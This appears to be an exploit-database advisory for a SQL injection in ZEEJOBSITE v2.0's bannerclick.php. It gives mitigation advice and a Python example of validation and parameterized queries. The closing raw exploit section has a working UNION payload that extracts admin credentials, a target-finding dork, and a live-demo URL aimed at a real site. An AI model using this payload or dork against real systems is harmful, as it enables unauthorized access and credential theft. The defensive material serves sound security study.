Vendor: ZEEJOBSITE
By: Hussin X
CVSS: 9 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: ZEEJOBSITE
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:zeeways:zeejobsite:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. The attacker can inject arbitrary SQL code through the vulnerable 'adid' parameter and have it executed in the context of the application's database. This can be used to bypass authentication and to access, modify, or delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks: the 'adid' parameter should be checked against the form the application expects before it is used. The application should also use parameterized queries, so that user-supplied input is bound as a value and never interpreted as SQL.
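The two mitigations above, shown side by side with the concatenation pattern that causes the problem. This is an added illustration in Python with sqlite3, not the ZEEJOBSITE PHP code; the table and column names (banners, admin, id, url, clicks, name, pwd) and the sample rows are assumptions constructed for the example.

```python
"""Added example: validating an 'adid'-style parameter and binding it as a
query parameter, beside the string-concatenation pattern behind the advisory.
Schema, table names and rows are constructed stand-ins, not the real app."""
import sqlite3

# Constructed schema standing in for the application's tables (assumed names).
SCHEMA = """
CREATE TABLE banners (id INTEGER PRIMARY KEY, url TEXT, clicks INTEGER DEFAULT 0);
CREATE TABLE admin (id INTEGER PRIMARY KEY, name TEXT, pwd TEXT);
INSERT INTO banners (id, url) VALUES (5, 'https://example.test/ad5');
INSERT INTO admin (id, name, pwd) VALUES (1, 'admin', 'hashed-secret');
"""


def open_db():
    """Return an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def banner_click_vulnerable(conn, adid):
    """The pattern the advisory describes: the request parameter is pasted
    straight into the SQL text, so whatever the client sends becomes SQL."""
    sql = "SELECT id, url, clicks FROM banners WHERE id=" + adid
    return conn.execute(sql).fetchone()


def validate_adid(raw):
    """Input validation: a banner id is a plain ASCII decimal number.
    Anything else (spaces, keywords, comment markers) is rejected outright."""
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("adid must be a positive integer")
    return int(raw)


def banner_click_safe(conn, raw_adid):
    """Validated parameter plus a parameterized query: the value is bound by
    the driver and is compared as data, never parsed as SQL."""
    adid = validate_adid(raw_adid)
    row = conn.execute(
        "SELECT id, url, clicks FROM banners WHERE id=?", (adid,)
    ).fetchone()
    if row is not None:
        conn.execute("UPDATE banners SET clicks=clicks+1 WHERE id=?", (adid,))
    return row


def parameterized_only(conn, raw_adid):
    """Even without the validator, a bound parameter is only ever a value:
    a crafted string is not equal to any integer id, so no row comes back."""
    return conn.execute(
        "SELECT id, url FROM banners WHERE id=?", (raw_adid,)
    ).fetchone()


if __name__ == "__main__":
    db = open_db()
    print("benign request:", banner_click_safe(db, "5"))
    # The advisory's parameter value, used here only to show it being refused.
    crafted = "-5 union select 1,2,concat(name,0x3e,pwd),4,5,6,7,8,9 from admin--"
    try:
        banner_click_safe(db, crafted)
    except ValueError as err:
        print("rejected by validation:", err)
    print("bound as a value, no match:", parameterized_only(db, crafted))
```

Validation and parameter binding are independent layers: the validator gives a clean error and a log line at the edge, while the bound parameter guarantees that even a value that slips past validation cannot change the query's structure.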

Exploit-DB raw data:

|___________________________________________________|
|
| ZEEJOBSITE v2.0  (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html
|
| DorK : inurl:employer_profile.php?compid=
|___________________________________________________|

Exploit:  
________



www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




L!VE DEMO:
_________


http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




___________________


Admin  LogiN :

www.[target].com/Script/admin/


____________________________( Greetz )____________________________
|
|  tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|   
|  jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-15]